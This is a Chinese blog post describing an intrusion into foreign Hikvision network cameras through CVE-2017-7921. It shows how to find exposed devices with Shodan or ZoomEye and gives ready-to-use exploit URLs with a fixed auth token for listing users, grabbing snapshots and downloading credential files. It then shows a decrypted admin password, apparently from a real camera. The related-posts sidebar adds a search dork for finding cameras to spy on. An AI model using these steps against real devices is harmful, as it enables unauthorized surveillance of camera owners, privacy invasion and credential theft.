一次对国外Hikvision网络摄像头的渗透——Pakzat

最新推荐文章于 2024-06-06 13:00:00 发布
最新推荐文章于 2024-06-06 13:00:00 发布
阅读量629 收藏 13
点赞数 6
文章标签: 安全 linux python github 算法 pip web安全
本文链接:https://blog.csdn.net/qq_52337463/article/details/135951947
版权

@Author: Pakzat

QQ:3369308571

警告:

写此文章是出于教育目的,此内容仅供参考,不能用来干违反国家任何法律法规的事情,不能用来进行违法活动,带来的一切后果作者不承担任何责任!

产品简介:

        Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。Hikvision的网络摄像头产品线非常丰富,涵盖了各种型号和功能,以满足不同用户的需求。

 漏洞描述:

        Hikvision摄像头产品的越权漏洞(CVE-2017-7921)是一种严重的安全问题,该漏洞允许未经授权的用户访问和控制系统。通过特定的路径访问Hikvision摄像头的某些功能,包括检索所有用户及其角色的列表、获取相机快照以及下载摄像头配置账号密码文件等。

查找目标

我们打开Zoomeye或Shodan搜索app:"Hikvision IP camera httpd"

如下三个特定url:

检索所有用户及其角色的列表
[host]/Security/users?auth=YWRtaW46MTEK

获取相机快照而不进行身份验证
[host]/onvif-http/snapshot?auth=YWRtaW46MTEK

下载摄像头配置账号密码文件
[host]/System/configurationFile?auth=YWRtaW46MTEK

例如:
下载摄像头配置账号密码
比如host是192.168.1.1:5000那就是
192.168.1.1:5000/System/configurationFile?auth=YWRtaW46MTEK

下载的配置文件是加密的,需要我们解密,公众号(Pakzat网络科技)​​​​​​​发hikvision解密来获取解密程序。

下面是解密成果

用户名就是里边的admin,密码在用户名后边的SeksZPedalami69

打开了,就是这么简单

Pakzat24
关注
  • 6
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
【漏洞复现】Hikvision摄像头产品代码执行漏洞(CVE-2021-36260)
晚风不及你
01-20 3083
Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。Hikvision网络摄像头产品线非常丰富,涵盖了各种型号和功能,以满足不同用户的需求。
【精选】win7内网穿透&meterpreter后渗透&msf开启摄像头
人若无名,便可专心练剑
01-21 254
Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。
windows下python3.7调用海康威视网络摄像头sdk
10-23
windows下python3.7调用海康威视网络摄像头sdk CH-HCNetSDKV6.1.4.42_build20200527_win64
摄像头漏洞检测
jorhelp的博客
06-06 2078
学校、商场、咖啡厅甚至一些家庭,这些设备维护不够完善的地方,总会存在网络安全隐患。对于网络摄像头设备,安全性显得尤为重要,因为它会泄露我们的隐私。然而总会有些人因为懒得打补丁,或者是使用弱口令导致摄像头被黑客造访,变成了现场直播。这个开源的项目:Ingram 可以帮助我们快速检测网段中的摄像头设备是否存在漏洞或者弱口令问题。以便于及时修复,避免造成损失。严厉声明:该项目仅供学习与安全检测,请大家心存正义,切勿用于非法用途。安装:...
海康摄像头CVE-2021-36260漏洞复现
最新发布
Karka_的博客
06-06 686
攻击者利用该漏洞可以用无限制的 root shell 来完全控制设备,即使设备的所有者受限于有限的受保护 shell(psh)。除了入侵 IP摄像头外,还可以访问和攻击内部网络。该漏洞的利用并不需要用户交互,攻击者只需要访问 http 或 HTTPS服务器端口(80/443)即可利用该漏洞,无需用户名、密码、以及其他操作。摄像头本身也不会检测到任何登录信息。
渗透测试】Surveillance - HackTheBox,网络摄像头渗透+SSH端口转发访问本地资源
m0_74272345的博客
12-15 1153
一个网络摄像头的靶机,部署craftcms WEB服务,本地部署zoneminder服务视频监控web一眼看到是Craft CMS,之前ACTF差不多,直接拿GitHub里面的POC一把梭,拿到www-data权限在Web目录下找到一个数据库备份文件,保存下来在自己的本地重建数据库,发现Matthew用户的hash,密码复用拿到matthew的权限linpeas自动枚举发现很多信息指向zoneminder,针对性的搜索发现zoneminder用nginx部署在本地,使用SSH端口转发。
海康威视漏洞综合利用工具-HikvisionExploitGUI
siu~
05-10 2159
海康威视漏洞综合利用工具,支持一键上传哥斯拉等多种利用方式
GOOGLE的摄像头漏洞
fcxiao的专栏
09-17 2391
GOOGLE的摄像头漏洞 inurl:"ViewerFrame?Mode=" GOOGLE上面输入这段代码,就可以找到有web功能的摄像头,传说全世界有好几万部。还要下载一个插件就可以偷窥人家了。 建议大家把好的地点网址贴出来分享! http://flower-center.miemasu.net ... tion&Language=1 http://210.134.20.21/ViewerFra
最新网络摄像头android sdk开发包,适用海康
11-12
在Android平台上进行网络摄像头开发是一项复杂而有趣的工作,它涉及到硬件接口、流媒体处理、图像编码解码等多个技术领域。海康作为知名的安防设备制造商,提供了适用于Android的SDK,使得开发者能够轻松地集成网络...
海康威视摄像头显示控制_Hikvision_labview_
09-30
标题“海康威视摄像头显示控制_Hikvision_labview_”和描述“Hikvision display control”提及的核心知识点是关于海康威视(Hikvision摄像头与LabVIEW(Laboratory Virtual Instrument Engineering Workbench)...
python调用海康SDK拉取网络摄像头视频流
06-04
本篇文章将深入探讨如何使用Python编程语言调用海康威视(Hikvision)的SDK来拉取网络摄像头的视频流。海康威视作为全球领先的安防产品提供商,提供了丰富的SDK供开发者进行二次开发。 首先,我们需要了解海康SDK的...
基于ubuntu下海康摄像头设备网络SDK开发
11-14
在本文中,我们将深入探讨如何在Ubuntu操作系统上利用QT5.7框架和海康摄像头设备的网络SDK进行开发。这个项目旨在实现摄像头的预览、抓拍、人脸检测以及背图上传等功能。为了达成这些目标,开发者需要具备对QT GUI...
kali系统渗透window实现屏幕监控
热门推荐
鸣风
12-23 1万+
kali系统渗透window实现屏幕监控
城市摄像头安全漏洞
andychuen的专栏
01-02 2345
1.摄像头安全漏洞:弱口令、使用相同固件、分布广易受攻击   网络安全创新企业华顺信安,于本周四发布《网络空间测绘系列—2018年摄像头安全报告》。这是首个基于国内网络空间测绘技术的摄像头安全报告。     互联网摄像头暴露情况   报告显示,摄像头已经无所不在,全球228个国家和地区,8063个城市,2635万个摄像头暴露在公网。DDoS攻击、机构安全风险、个人隐私泄露等事件层...
海康威视(Hikvision) 摄像头-CVE-2017-7921漏洞复现
m0_49025459的博客
07-04 5046
许多HikvisionIP摄像机包含一个后门,允许未经身份验证的模拟任何配置的用户帐户。
多个Wyze 摄像头漏洞可导致攻击者接管设备并访问视频
smellycat000的专栏
04-02 538
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士热门 Wyze Cam 设备中存在三个漏洞,可导致恶意人员执行任意代码、访问摄像头并越权读取SD卡,而距离漏洞初次发现近3年后,越权读取SD卡的问题仍未解决。这些漏洞和认证绕过 (CVE-2019-9564)、因栈缓冲区溢出导致的远程执行 (CVE-2019-12266) 和SD卡内容未认证访问(无CVE)有关。成功利用...
虹科案例|安全性防护平台-海康威视摄像机中的重大漏洞
Hongke_IIOT的博客
05-19 2941
前言 我们Vdoo的安全研究团队对领先的物联网产品和安全设备进行了大规模的安全研究,为了提高效率和透明度,此过程设备供应商也参与其中。 这项研究的一部分是研究人员在多家供应商的设备中发现了零日漏洞。这些漏洞我们已经负责任地以最佳方式向供应商披露,并将在披露期限结束后逐步分享。 我们发现易受攻击设备的供应商之一是海康威视。研究团队在海康威视安全摄像机中发现了一个漏洞。攻击者利用该漏洞能成功获取摄像机IP地址,并且使用摄像机的root特权(通过LAN或Internet)远程执行代码。虹科Vdoo负责任地披露了
hikvision监控摄像头说明
09-07
海康威视(Hikvision)监控摄像头是一种高质量的监控设备,广泛应用于安防领域。该摄像头具有多项先进技术和功能,能够提供清晰、稳定的监控图像。 首先,Hikvision监控摄像头采用了高分辨率的图像传感器,能够捕捉到更多细节和清晰度较高的图像。无论是在白天还是夜晚,都能够提供优秀的图像质量,使用户能够清晰地监视目标。 其次,该摄像头还具备强大的远距离监控能力。通过高性能的镜头和光学变焦技术,可以实现远距离的监控,满足用户对大范围监控的需求。 除了图像质量和监控范围,Hikvision监控摄像头还具备智能功能。例如,它配备了智能分析算法,能够实现人脸识别、行为分析等功能,帮助用户更精确地监测目标并提高安全性。 同时,该摄像头还具备网络连接能力,可以通过网络实现远程查看和控制。用户只需在手机或电脑上安装相应的软件,便可随时随地查看摄像头的视频流,保证监控的及时性和便捷性。 总体而言,Hikvision监控摄像头以其卓越的性能和智能功能深受用户欢迎。它不仅提供优质的图像质量和远距离监控能力,还能通过智能分析和远程连接帮助用户更好地满足安防需求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值